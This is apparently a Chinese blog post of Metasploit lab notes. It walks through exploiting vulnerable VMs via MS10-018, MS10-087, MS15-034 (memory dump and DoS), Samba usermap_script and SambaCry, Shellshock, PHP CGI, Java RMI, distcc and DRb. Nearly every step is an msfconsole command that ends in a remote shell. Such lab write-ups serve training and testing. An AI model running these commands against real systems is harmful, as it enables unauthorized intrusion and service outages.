6.msf实验

1.1 浏览器攻击渗透(MS10-018)

正向连接:正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接

反向连接:攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接。
正向连接和反向连接针对的都是payload。

反向连接:
1.执行search ms10-018命令,搜索路径
2.执行use exploit/windows/browser/ms10_018_ie_behaviors命令。
3.执行show options命令,查看要设置哪些东西。
设置一下自己服务器的ip:set SRVHOST 192.168.60.107。


image.png

4.输入run,进行运行。会出现一个url地址,把url地址复制到xp系统的ie浏览器进行访问,等一段时间msfconsole中就出现了successfuully。输入sessions -i 1(i就是in进入的意思,1就是会话的ID)。进入之后就可以执行shell了。


image.png

image.png

正向连接:
1.执行search ms10-018命令,搜索路径
2.执行use exploit/windows/browser/ms10_018_ie_behaviors命令。
3.执行show options命令,查看要设置哪些东西。
设置一下自己服务器的ip:set SRVHOST 192.168.60.107。
4.设置一个payload正向连接shell:
set PAYLOAD windows/meterpreter/bind_tcp


image.png

5.执行run

image.png

1.3 应用软件格式渗透,利用word去渗透(MS10-087)

1.进入msfconsole下,搜索下ms10-018的路径:search ms10-087。
2.使用这个模块:
Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof


image.png

3.设置文件名。set FILENAME ceshi.rtf

4.run运行。到root根目录下显示隐藏文件。到靶机运行。


image.png

image.png

1.2 CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

1.利用ms15-034漏洞读取服务器内存数据
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run


image.png

2.利用ms15-034漏洞进行ddos攻击
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.60.33
set threads 10
run
3.在windows server2008上设置


image.png

4.run运行。


image.png

image.png

5.漏洞修复
禁用IIS内核缓存(可能降低IIS性能)
image.png

image.png

1.3 CVE-2017-8464震网三代(远程快捷方式漏洞)

CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

1.4 利用 samba 服务漏洞入侵linux主机(CVE-2020-0796与samba低版本漏洞利用)(139,445端口)

1.在虚拟机中导入Metasploitable2-Linux。
默认的用户名密码都是msfadmin.
并设置为桥接模式。并将普通模式改为管理员模式,使用命令:sudo passwd root


image.png

image.png

2.使用xshell,新建会话,输入ip,用户名,密码等信息。
3.打开metasploit之后需要先判断samba的版本,命令如下:
msf> search scanner/samba
//这条命令用来查找samba相关exploit参数
4、然后使用如下命令来定义要扫描samba的版本所用到的exploits参数。
msf> use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.60.65
//这条命令定义你将要扫描samba版本的远程主机的IP地址.
exploit
//该命令将开始漏洞利用


image.png

5、发现samba版本之后,我们需要进一步利用来入侵进入到远程linux主机
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.60.65
msf exploit(usermap_script) > exploit
成功创建了shell 会话.


image.png

1.5.2 smb其它漏洞Linux smb漏洞(CVE-2017-7494)复现

SambaCry漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到Root权限并控制肉鸡
漏洞编号:CVE-2017-7494
漏洞等级:严重
影响版本:漏洞影响了Samba 3.5.0 之后的版本,不包含4.6.4/4.5.10/4.4.14
在靶机kali2.0的设置
1.查看samba版本并打开samba配置文件添加以下配置。
使用命令:root@kali:~# samba -V

  1. vi /etc/samba/smb.conf加入以下内容:
[public]
   comment = public
   browseable = yes
   writeable =yes
   path = /tmp/public
   public = yes
   read only = no

3.在Kali 里面创建Samba共享目录
使用命令:
创建共享目录
root@kali:~# mkdir /tmp/public
修改读写执行权限
root@kali:~# chmod 777 /tmp/public

image.png

重启samba服务
root@kali:~# /etc/init.d/samba restart
查看samba进程
root@kali:~# ps aux | grep samba
查看samba端口状态(采用139和445端口)
root@kali:~# netstat -tnlp samba

在攻击机上的设置
5.更新MSF后使用"exploit/linux/samba/is_known_pipename"利用模块,设置rhost后直接exploit即可得到shell。

image.png

1.5 Bash Shellshock CVE-2014-6271(破壳)

Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击

1.进入到靶机metasploitable2的/usr/lib/cgi-bin/目录下,新建Hello.sh,
使用命令:touch hello.sh
或者
sudo nano hello.sh(ctrl+
o保存,enter输入文件名, ctrl+x退出)

2.输入正确的密码,然后对hello.sh脚本进行编辑#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
保存好后,赋予脚本可执行权限,使用chmod命令:
sudo chmod 755 hello.sh

image.png

3.进入浏览器,输入http://192.168.60.65/cgi-bin/hello.sh

image.png

4.使用search命令来搜索exploits。输入shellshock。找到apache_mod_cgi_bash_env_exec模块


image.png

5.根据show options设置远程IP地址rhost和文件路径targeturi


image.png

6.run运行,然后使用shell进入靶机。
image.png

1.6 PHP CGI漏洞利用

msf > search cve:2012-1823
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
msf exploit(php_cgi_arg_injection) > set rhost 192.168.0.102
rhost => 192.168.0.102
msf exploit(php_cgi_arg_injection) > run
image.png

1.7 Java RMI SERVER 命令执行漏洞(java cve-2013-0422)

Java RMI SERVER 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,导致代码执行。

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.60.65(靶机ip)
exploit
shell(进入meterpreter 时执行)

image.png

1.8 Distcc后门漏洞

安全组织索引:CVE-2004-2678、OSVDB-13378

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是Xcode 1.5版本及其他版本的 distcc 2.x版本配置对于服务器端口的访问不限制

1.use exploit/unix/misc/distcc_exec
2.set RHOSTS 192.168.60.65
3.set payload set payload cmd/unix/bind_perl
4.run


image.png

1.9 Druby命令执行

Druby配置不当,被滥用执行命令

利用步骤:
启动metasploit

1.search drb //搜索drb相关漏洞
2.use exploit/linux/misc/drb_remote_codeexec
3.set URL druby:IP:8787 //设置目标druby链接
4.exploit

image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,457评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,837评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,696评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,183评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,057评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,105评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,520评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,211评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,482评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,574评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,353评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,213评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,576评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,897评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,174评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,489评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,683评论 2 335